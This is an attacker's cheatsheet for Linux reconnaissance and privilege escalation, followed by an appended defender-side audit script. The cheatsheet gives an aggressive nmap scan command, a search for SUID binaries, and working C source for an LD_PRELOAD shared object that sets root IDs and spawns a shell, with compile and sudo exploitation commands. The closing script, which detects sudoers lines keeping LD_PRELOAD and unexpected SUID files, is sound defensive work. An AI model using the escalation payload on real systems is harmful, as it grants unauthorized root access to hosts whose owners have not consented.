Attacker's Cheatsheet
- (recon//scan): Robust host discovery and scanning with nmap:
$ sudo nmap -T5 --stats-every 60s --log-errors --reason --randomize-hosts \
    -v -n -PE -PM -PO -PU -sS -sV -oA scan_results ${TARGETS?}
This requires sudo because of the UDP ping scan (flag -PU). It also uses -T5, the most aggressive timing template; for a stealthier scan, use a lower -T value.
- (privesc//linux): Find files with the SUID bit set:
$ find / -perm -4000 -type f 2> /dev/null
- (privesc//linux): Dynamic linker hijacking using LD_PRELOAD:
Compile the following C program as a shared object:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* setuid/setgid prototypes */

/* Runs when the shared object is loaded: with -nostartfiles, _init is the
 * entry point the dynamic linker calls, so this executes inside the
 * privileged process before its own main() does. */
void _init() {
    unsetenv("LD_PRELOAD");   /* avoid re-injecting into the spawned shell */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
$ gcc -fPIC -shared -nostartfiles -o /tmp/shell.so shell.c
And then exploit a vulnerable binary:
$ sudo LD_PRELOAD=/tmp/shell.so /bin/ls
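Added defender-side audit covering the two Linux privesc entries above (example code, not part of the cheatsheet): sudo's env_reset normally strips LD_PRELOAD before running the command, so a sudoers "env_keep += LD_PRELOAD" line is the precondition for the preload trick, and a SUID listing compared against a known-good baseline catches planted binaries. Function names and sample files are this example's own.

```shell
#!/bin/sh
# Added audit script (not from the cheatsheet): two defender-side checks
# matching the two privesc entries above.
#  1) sudo's env_reset normally strips LD_PRELOAD before running the command;
#     a "Defaults env_keep += LD_PRELOAD" line is what makes a sudo-allowed
#     binary vulnerable to the preload trick, so flag such lines.
#  2) report SUID files that are not in a known-good baseline listing
#     (both listings one path per line, as produced by the find command above).
# Function names and sample data below are this example's own.

# Usage: check_ldpreload_env_keep SUDOERS_FILE -> prints hits, returns 1 if any
check_ldpreload_env_keep() {
    # strip comments first so a commented-out line is not reported;
    # "env_keep -=" (removing the variable) is deliberately not matched
    hits=$(sed 's/#.*$//' "$1" | grep -E 'env_keep[[:space:]]*\+?=.*LD_PRELOAD' || true)
    [ -z "$hits" ] && return 0
    printf 'FINDING: %s keeps LD_PRELOAD across sudo:\n%s\n' "$1" "$hits"
    return 1
}

# Usage: check_new_suid BASELINE_FILE CURRENT_FILE -> prints new paths, returns 1 if any
check_new_suid() {
    # -x whole-line, -F fixed strings, -v keep lines of CURRENT absent from BASELINE
    new=$(grep -vxF -f "$1" "$2" || true)
    [ -z "$new" ] && return 0
    printf 'FINDING: SUID files not in baseline:\n%s\n' "$new"
    return 1
}

# Stand-alone run on constructed sample files (not data from a real host).
demo() {
    d=$(mktemp -d) || return 2
    printf 'Defaults env_reset\nDefaults env_keep += "LD_PRELOAD"\n' > "$d/sudoers"
    printf '/usr/bin/passwd\n/usr/bin/sudo\n' > "$d/suid.baseline"
    printf '/usr/bin/passwd\n/usr/bin/sudo\n/tmp/shell\n' > "$d/suid.now"
    rc=0
    check_ldpreload_env_keep "$d/sudoers" || rc=1
    check_new_suid "$d/suid.baseline" "$d/suid.now" || rc=1
    rm -rf "$d"
    return $rc    # 1 here: both constructed inputs contain a finding
}
demo || echo "demo: findings reported above"
```

Feed the first function the host's sudoers (and the files under its includedir) and the second a fresh run of the find command above against a saved baseline.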